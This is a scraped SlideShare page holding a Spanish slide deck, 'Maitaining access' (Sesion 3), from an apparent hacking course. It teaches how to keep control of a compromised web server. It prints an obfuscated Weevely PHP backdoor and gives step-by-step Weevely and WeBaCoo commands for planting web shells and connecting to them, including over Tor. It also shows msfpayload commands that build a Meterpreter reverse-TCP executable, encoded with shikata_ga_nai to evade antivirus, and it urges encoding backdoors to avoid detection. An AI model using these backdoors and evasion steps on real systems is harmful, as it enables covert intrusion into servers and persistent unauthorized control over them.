SlideShare una empresa de Scribd logo
Sesion 3
 Una vez que se tiene acceso a la página web (objetivo), tenemos que mantener el
acceso para su uso futuro, porque no queremos estar empezando desde cero una
y otra vez.
 Con el fin de evitar esto, podemos cargar las shell's web o puertas traseras a la
página web. La codificación de la puerta trasera también es importante, ya que no
debe crear "ruido" una vez cargado en el servidor.
 Si es así, entonces los administradores pueden fácilmente detectar y eliminar las
puertas traseras.
 En la suite de Backtrack5 R3 se incorporan buenas herramientas para llevar a
cabo este proceso, como lo es Weevely.
 Es una herramienta esencial para la explotación posterior de aplicaciones web, y
se puede utilizar como puerta trasera o como una shell web para gestionar las
cuentas web.
 Weevely busca funciones como system(), passthru(), popen(), exec(),
proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) utilizando
las funciones activadas en una servidor remoto.
 El código siguiente es un ejemplo del código de la puerta trasera creada por
Weevely.
 -----------------------------------------------------------------------------------------------------------
--------
 eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSw
k
YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPG
Zv
c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK
GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz
4nO30='));
 -----------------------------------------------------------------------------------------------------------
--------
 Se ubica en: Applications - BackTrack - Maintaining Access - Web BackDoors -
Weevely
MAITAINING ACCESS
MAITAINING ACCESS
 Uso:
 /pentest/backdoors/web/weevely# ./weevely.py generate password
/root/back.php
MAITAINING ACCESS
MAITAINING ACCESS
 Posteriormente:
 /pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-
web.com/back.php password
MAITAINING ACCESS
MAITAINING ACCESS
MAITAINING ACCESS
 WeBaCoo (Web Backdoor Cookie) es un backdoor que proporciona una terminal
de conexión a través de HTTP entre el cliente y el servidor web.
 Se trata de una herramienta de explotación para mantener el acceso a un servidor
web (hacked).
 Fue diseñado para operar bajo el radar de la moderna puesta al anticuado AV,
NIDS, IPS, Network Firewalls y Application Firewalls, lo que demuestra un
mecanismo de sigilo para ejecutar comandos en el servidor comprometido.
 El archivo ofuscado realiza comunicación mediante HTTP header's Cookie
validando solicitudes y respuestas HTTP del servidor web.
 WeBaCoo ofrece un modo de generar el código para crear el PHP backdoor,
usando payloads predefinidos.
 También ofrece la "terminal" el modo en que el usuario puede establecer una
remota conexión con el servidor y ejecutar comandos con privilegios deseados
del servicio web.
 En la suite de Kali se incorporan buenas herramientas para llevar a cabo este
proceso, como lo es Webacoo.
 Se ubica en: Applications - BackTrack - Maintaining Access - Web BackDoors -
Weevely
MAITAINING ACCESS
MAITAINING ACCESS
 1) Crear backdoor ofuscado 'backdoor.php' con la configuración predeterminada:
./webacoo.pl -g -o backdoor.php
 2) Crear 'raw-backdoor.php' backdoor des-ofuscado usando la funciona "transito":
./webacoo.pl -g -o raw-backdoor.php -f 4 -r
 3) Establecer "terminal" conexión con el host remoto usando la configuración por
defecto:
 ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
 4) Establecer "terminal" conexión con el host remoto al configurar algunos
argumentos:
 ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
 5) Establecer "terminal" conexión con el host remoto a través de proxy HTTP:
./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
 6) Establecer "terminal" conexión con el host remoto a través de HTTP proxy con
autenticación básica:
 ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
 7) Establecer "terminal" conexión con el host remoto a través de Tor y registrar la
actividad:
 ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt
 Primero generamos nuestro backdoor el cual tiene una configuración
predeterminada, como se muestra a continuación
MAITAINING ACCESS
 Posteriormente verificamos que el backdoor se haya creado
MAITAINING ACCESS
 Una vez que el backdoor se encuentra alojado en el sitio que deseamos controlar
y atacar ejecutaremos lo siguiente
 ./webacoo.pl -t -u http://paginaweb.com/backdoor.php
MAITAINING ACCESS
 Si todo ha ido bien nos aparecerá lo siguiente
MAITAINING ACCESS
MAITAINING ACCESS
 Una vez establecida la conexión podemos teclear help para darnos una idea de la
instrucciones que podemos ejecutar
MAITAINING ACCESS
MAITAINING ACCESS
 Metasploit se puede utilizar para crear puertas traseras que luego pueden ser
utilizados para mantener el acceso en el servidor web.
 Esto se puede hacer con la ayuda de Msfpayload.
 Los pasos para crear puerta trasera en Msfpayload son como sigue:
 Tenemos que seleccionar el Payload que vamos a utilizar para obtener un shell
Meterpreter generado a través de una conexión TCP inverso.
 El comando sería:
 msfpayload windows/meterpreter/reverse_tcp
 Este Payload tiene dos parámetros:
 LHOST (nuestra IP) y el LPORT para seleccionar el puerto que vamos a utilizar.
 La "R" se utiliza para dar al archivo de salida en formato de datos RAW para que
podamos codificar posteriormente.
 Su instrucción seria
 msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234
 Este comando creará el Payload, pero tiene que ser codificado con el fin de evitar
la detección de los antivirus, para tal caso se puede hacer usando la opción
msfencode, para hacer esto, necesitamos usar barra vertical ("|")
 Su instrucción seria
 windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode
–e x86/shikata_ga_nai –t exe >> bucker.exe
 Nota:
 -e se usa para especificar el tipo de codificación necesario, en este caso se esta
usando la codificación shikata_ga_nai (Shikata ga nai es una técnica de
codificación que permite evadir más del 50% de antivirus del mercado) y -t para
el tipo de extensión del archivo (exe).
 Este comando creará el Payload, pero tiene que ser codificado con el fin de evitar
la detección de los antivirus, para tal caso se puede hacer usando la opción
msfencode, para hacer esto, necesitamos usar barra vertical ("|")
 Su instrucción seria
 windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode
–e x86/shikata_ga_nai –t exe >> bucker.exe
 Nota:
 -e se usa para especificar el tipo de codificación necesario, en este caso se esta
usando la codificación shikata_ga_nai (Shikata ga nai es una técnica de
codificación que permite evadir más del 50% de antivirus del mercado) y -t para
el tipo de extensión del archivo (exe).
 Por ejemplo, si deseamos ver la lista de los codificadores disponibles en MSF,
usamos el siguiente comando:
 msfpayload windows/meterpreter/reverse_tcp –l
 Como se denota a continuación
MAITAINING ACCESS
MAITAINING ACCESS
MAITAINING ACCESS
 Estos son sólo unos pocos métodos que se pueden seguir para realizar la
explotación de las vulnerabilidades en una aplicación web.
 Una vez que tengamos la información acerca de nuestro objetivo, tratar de realizar
una evaluación de la vulnerabilidad con el fin de obtener información sobre los
exploits que se pueden utilizar.
 Una vez hecho esto, explotar las vulnerabilidades y si es necesario, cargar un
backdoor, pero antes de eso, se debe codificar el backdoor con el fin de evitar la
detección.

Más contenido relacionado

PPT
Maitaining access
PPTX
Ethical hacking 02
PPTX
Ethical hacking 03
PPTX
Ethical hacking 01
PPTX
Ethical hacking 04a
PPTX
Escaneo de Puertos
PPTX
Ethical hacking 00a
PDF
Ataque DNS Spoofing
Maitaining access
Ethical hacking 02
Ethical hacking 03
Ethical hacking 01
Ethical hacking 04a
Escaneo de Puertos
Ethical hacking 00a
Ataque DNS Spoofing

La actualidad más candente (20)

PDF
Penetración con una Backdoor
PDF
Ataque por dns spooging y troyano
PPTX
Dns spoofing kali linux
PDF
Ataque win xp
ODP
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
PPTX
Ataque sql web
PDF
Cómo explotar EternalBlue en Windows Server 2012 R2
PDF
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
PPTX
Armitage pruebas
PDF
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
PPTX
2. ataque por inyección de código sql a sitio web
ODT
Aircrack ng: comandos básicos
PDF
Seguridad en Servidores CentOS con Elastix + Buenas Prácticas
PDF
Crack redes wifi
PPTX
Fail2 ban
PDF
0 entorno php
PDF
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
PDF
Entorno PHP
PDF
Monitoreando servidores Elastix con Nagios
PDF
Airbase y KARMetasploit
Penetración con una Backdoor
Ataque por dns spooging y troyano
Dns spoofing kali linux
Ataque win xp
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Ataque sql web
Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Armitage pruebas
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
2. ataque por inyección de código sql a sitio web
Aircrack ng: comandos básicos
Seguridad en Servidores CentOS con Elastix + Buenas Prácticas
Crack redes wifi
Fail2 ban
0 entorno php
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
Entorno PHP
Monitoreando servidores Elastix con Nagios
Airbase y KARMetasploit
Publicidad

Destacado (8)

PDF
Backtrak guide
PPTX
Lateral Movement by Default
PDF
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
PPTX
mimikatz @ phdays
PPTX
Lateral Movement - Phreaknik 2016
PDF
Offensive Security with Metasploit
PPTX
mimikatz @ asfws
PPTX
Golden ticket, pass the ticket mi tm kerberos attacks explained
Backtrak guide
Lateral Movement by Default
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
mimikatz @ phdays
Lateral Movement - Phreaknik 2016
Offensive Security with Metasploit
mimikatz @ asfws
Golden ticket, pass the ticket mi tm kerberos attacks explained
Publicidad

Similar a MAITAINING ACCESS (20)

PPTX
Conferencia Innovación en Técnicas de Ethical Hacking
PDF
Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
PPTX
Presentation OWASP Day @ FIUBA.AR
PDF
Backdoor via inyeccion
DOCX
Trabajo de seguridad informatica 1
PDF
Hacking ético [Pentest]
PPTX
CPMX5 - Hacking like a boss por Roberto Salgado
PDF
Scripting para Pentesters v1.0
PDF
Solucion reto breach
PDF
Seguridad: Backtrack2
PDF
Metasploit
PDF
Episodio de pentesting
PDF
Recopilación de Penetration Test Backtrack
PDF
Índice del libro: "Python para pentesters" [2ª Edición] de 0xWord
PDF
PDF
Android
PDF
Redes del Computador — UNIDAD III: Seguridad de las redes
PPTX
Uso del troyano cybergate ok
DOCX
Conferencia Innovación en Técnicas de Ethical Hacking
Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
Presentation OWASP Day @ FIUBA.AR
Backdoor via inyeccion
Trabajo de seguridad informatica 1
Hacking ético [Pentest]
CPMX5 - Hacking like a boss por Roberto Salgado
Scripting para Pentesters v1.0
Solucion reto breach
Seguridad: Backtrack2
Metasploit
Episodio de pentesting
Recopilación de Penetration Test Backtrack
Índice del libro: "Python para pentesters" [2ª Edición] de 0xWord
Android
Redes del Computador — UNIDAD III: Seguridad de las redes
Uso del troyano cybergate ok

Más de Tensor (20)

PDF
Libertad
PPTX
Método de la regla falsa (o metodo de la falsa posición)
PPTX
Metodo de la bisección
PPTX
Transito vehicular
PPTX
Teoria de colas
PDF
Practica 7 2016
PDF
Practica 6 2016
PPTX
Game maker
PDF
Practica 5 2016
PPTX
Procesamiento de archivos
PPTX
Cadenas y funciones de cadena
PPTX
Simulación en promodel clase 04
PDF
Reduccion de orden
PDF
Variación+de+parametros
PDF
Coeficientes indeterminados enfoque de superposición
PDF
Bernoulli y ricatti
PDF
Practica no. 3 tiempo de servicio
PPTX
Clase 14 ondas reflejadas
PDF
Ondas em
PPTX
Clase 7 ondas electromagneticas
Libertad
Método de la regla falsa (o metodo de la falsa posición)
Metodo de la bisección
Transito vehicular
Teoria de colas
Practica 7 2016
Practica 6 2016
Game maker
Practica 5 2016
Procesamiento de archivos
Cadenas y funciones de cadena
Simulación en promodel clase 04
Reduccion de orden
Variación+de+parametros
Coeficientes indeterminados enfoque de superposición
Bernoulli y ricatti
Practica no. 3 tiempo de servicio
Clase 14 ondas reflejadas
Ondas em
Clase 7 ondas electromagneticas

Último (20)

PDF
Guia de Tesis y Proyectos de Investigacion FS4 Ccesa007.pdf
PDF
el - LIBRO-PACTO-EDUCATIVO-GLOBAL-OIEC.pdf
PDF
Didactica de la Investigacion Educativa SUE Ccesa007.pdf
PPT
Cosacos y hombres del Este en el Heer.ppt
DOCX
V UNIDAD - SEGUNDO GRADO. del mes de agosto
DOCX
PROYECTO DE APRENDIZAJE para la semana de fiestas patrias
PDF
SESION 12 INMUNIZACIONES - CADENA DE FRÍO- SALUD FAMILIAR - PUEBLOS INDIGENAS...
PDF
ciencias-1.pdf libro cuarto basico niños
PDF
COMPLETO__PROYECTO_VIVAN LOS NIÑOS Y SUS DERECHOS_EDUCADORASSOS.pdf
PDF
Unidad de Aprendizaje 5 de Matematica 1ro Secundaria Ccesa007.pdf
DOCX
2 GRADO UNIDAD 5 - 2025.docx para primaria
PDF
Crear o Morir - Andres Oppenheimer Ccesa007.pdf
PDF
Escuela Sabática 6. A través del Mar Rojo.pdf
PDF
Gasista de unidades unifuncionales - pagina 23 en adelante.pdf
PDF
Escuelas Desarmando una mirada subjetiva a la educación
PDF
benveniste-problemas-de-linguistica-general-i-cap-6 (1)_compressed.pdf
PDF
Unidad de Aprendizaje 5 de Educacion para el Trabajo EPT Ccesa007.pdf
PPTX
AGENTES PATÓGENOS Y LAS PRINCIPAL ENFERMEAD.pptx
PDF
Lección 6 Escuela Sab. A través del mar rojo.pdf
PDF
biología es un libro sobre casi todo el tema de biología
Guia de Tesis y Proyectos de Investigacion FS4 Ccesa007.pdf
el - LIBRO-PACTO-EDUCATIVO-GLOBAL-OIEC.pdf
Didactica de la Investigacion Educativa SUE Ccesa007.pdf
Cosacos y hombres del Este en el Heer.ppt
V UNIDAD - SEGUNDO GRADO. del mes de agosto
PROYECTO DE APRENDIZAJE para la semana de fiestas patrias
SESION 12 INMUNIZACIONES - CADENA DE FRÍO- SALUD FAMILIAR - PUEBLOS INDIGENAS...
ciencias-1.pdf libro cuarto basico niños
COMPLETO__PROYECTO_VIVAN LOS NIÑOS Y SUS DERECHOS_EDUCADORASSOS.pdf
Unidad de Aprendizaje 5 de Matematica 1ro Secundaria Ccesa007.pdf
2 GRADO UNIDAD 5 - 2025.docx para primaria
Crear o Morir - Andres Oppenheimer Ccesa007.pdf
Escuela Sabática 6. A través del Mar Rojo.pdf
Gasista de unidades unifuncionales - pagina 23 en adelante.pdf
Escuelas Desarmando una mirada subjetiva a la educación
benveniste-problemas-de-linguistica-general-i-cap-6 (1)_compressed.pdf
Unidad de Aprendizaje 5 de Educacion para el Trabajo EPT Ccesa007.pdf
AGENTES PATÓGENOS Y LAS PRINCIPAL ENFERMEAD.pptx
Lección 6 Escuela Sab. A través del mar rojo.pdf
biología es un libro sobre casi todo el tema de biología

MAITAINING ACCESS

  • 2.  Una vez que se tiene acceso a la página web (objetivo), tenemos que mantener el acceso para su uso futuro, porque no queremos estar empezando desde cero una y otra vez.  Con el fin de evitar esto, podemos cargar las shell's web o puertas traseras a la página web. La codificación de la puerta trasera también es importante, ya que no debe crear "ruido" una vez cargado en el servidor.  Si es así, entonces los administradores pueden fácilmente detectar y eliminar las puertas traseras.
  • 3.  En la suite de Backtrack5 R3 se incorporan buenas herramientas para llevar a cabo este proceso, como lo es Weevely.
  • 4.  Es una herramienta esencial para la explotación posterior de aplicaciones web, y se puede utilizar como puerta trasera o como una shell web para gestionar las cuentas web.  Weevely busca funciones como system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) utilizando las funciones activadas en una servidor remoto.  El código siguiente es un ejemplo del código de la puerta trasera creada por Weevely.
  • 6.  Se ubica en: Applications - BackTrack - Maintaining Access - Web BackDoors - Weevely
  • 9.  Uso:  /pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php
  • 12.  Posteriormente:  /pentest/backdoors/web/weevely# ./weevely.py http://www.sitio- web.com/back.php password
  • 16.  WeBaCoo (Web Backdoor Cookie) es un backdoor que proporciona una terminal de conexión a través de HTTP entre el cliente y el servidor web.  Se trata de una herramienta de explotación para mantener el acceso a un servidor web (hacked).  Fue diseñado para operar bajo el radar de la moderna puesta al anticuado AV, NIDS, IPS, Network Firewalls y Application Firewalls, lo que demuestra un mecanismo de sigilo para ejecutar comandos en el servidor comprometido.
  • 17.  El archivo ofuscado realiza comunicación mediante HTTP header's Cookie validando solicitudes y respuestas HTTP del servidor web.  WeBaCoo ofrece un modo de generar el código para crear el PHP backdoor, usando payloads predefinidos.  También ofrece la "terminal" el modo en que el usuario puede establecer una remota conexión con el servidor y ejecutar comandos con privilegios deseados del servicio web.
  • 18.  En la suite de Kali se incorporan buenas herramientas para llevar a cabo este proceso, como lo es Webacoo.
  • 19.  Se ubica en: Applications - BackTrack - Maintaining Access - Web BackDoors - Weevely
  • 22.  1) Crear backdoor ofuscado 'backdoor.php' con la configuración predeterminada: ./webacoo.pl -g -o backdoor.php  2) Crear 'raw-backdoor.php' backdoor des-ofuscado usando la funciona "transito": ./webacoo.pl -g -o raw-backdoor.php -f 4 -r  3) Establecer "terminal" conexión con el host remoto usando la configuración por defecto:  ./webacoo.pl -t -u http://127.0.0.1/backdoor.php  4) Establecer "terminal" conexión con el host remoto al configurar algunos argumentos:  ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
  • 23.  5) Establecer "terminal" conexión con el host remoto a través de proxy HTTP: ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080  6) Establecer "terminal" conexión con el host remoto a través de HTTP proxy con autenticación básica:  ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128  7) Establecer "terminal" conexión con el host remoto a través de Tor y registrar la actividad:  ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt
  • 24.  Primero generamos nuestro backdoor el cual tiene una configuración predeterminada, como se muestra a continuación
  • 26.  Posteriormente verificamos que el backdoor se haya creado
  • 28.  Una vez que el backdoor se encuentra alojado en el sitio que deseamos controlar y atacar ejecutaremos lo siguiente  ./webacoo.pl -t -u http://paginaweb.com/backdoor.php
  • 30.  Si todo ha ido bien nos aparecerá lo siguiente
  • 33.  Una vez establecida la conexión podemos teclear help para darnos una idea de la instrucciones que podemos ejecutar
  • 36.  Metasploit se puede utilizar para crear puertas traseras que luego pueden ser utilizados para mantener el acceso en el servidor web.  Esto se puede hacer con la ayuda de Msfpayload.  Los pasos para crear puerta trasera en Msfpayload son como sigue:  Tenemos que seleccionar el Payload que vamos a utilizar para obtener un shell Meterpreter generado a través de una conexión TCP inverso.  El comando sería:  msfpayload windows/meterpreter/reverse_tcp
  • 37.  Este Payload tiene dos parámetros:  LHOST (nuestra IP) y el LPORT para seleccionar el puerto que vamos a utilizar.  La "R" se utiliza para dar al archivo de salida en formato de datos RAW para que podamos codificar posteriormente.  Su instrucción seria  msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234
  • 38.  Este comando creará el Payload, pero tiene que ser codificado con el fin de evitar la detección de los antivirus, para tal caso se puede hacer usando la opción msfencode, para hacer esto, necesitamos usar barra vertical ("|")  Su instrucción seria  windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> bucker.exe  Nota:  -e se usa para especificar el tipo de codificación necesario, en este caso se esta usando la codificación shikata_ga_nai (Shikata ga nai es una técnica de codificación que permite evadir más del 50% de antivirus del mercado) y -t para el tipo de extensión del archivo (exe).
  • 39.  Este comando creará el Payload, pero tiene que ser codificado con el fin de evitar la detección de los antivirus, para tal caso se puede hacer usando la opción msfencode, para hacer esto, necesitamos usar barra vertical ("|")  Su instrucción seria  windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> bucker.exe  Nota:  -e se usa para especificar el tipo de codificación necesario, en este caso se esta usando la codificación shikata_ga_nai (Shikata ga nai es una técnica de codificación que permite evadir más del 50% de antivirus del mercado) y -t para el tipo de extensión del archivo (exe).
  • 40.  Por ejemplo, si deseamos ver la lista de los codificadores disponibles en MSF, usamos el siguiente comando:  msfpayload windows/meterpreter/reverse_tcp –l  Como se denota a continuación
  • 44.  Estos son sólo unos pocos métodos que se pueden seguir para realizar la explotación de las vulnerabilidades en una aplicación web.  Una vez que tengamos la información acerca de nuestro objetivo, tratar de realizar una evaluación de la vulnerabilidad con el fin de obtener información sobre los exploits que se pueden utilizar.  Una vez hecho esto, explotar las vulnerabilidades y si es necesario, cargar un backdoor, pero antes de eso, se debe codificar el backdoor con el fin de evitar la detección.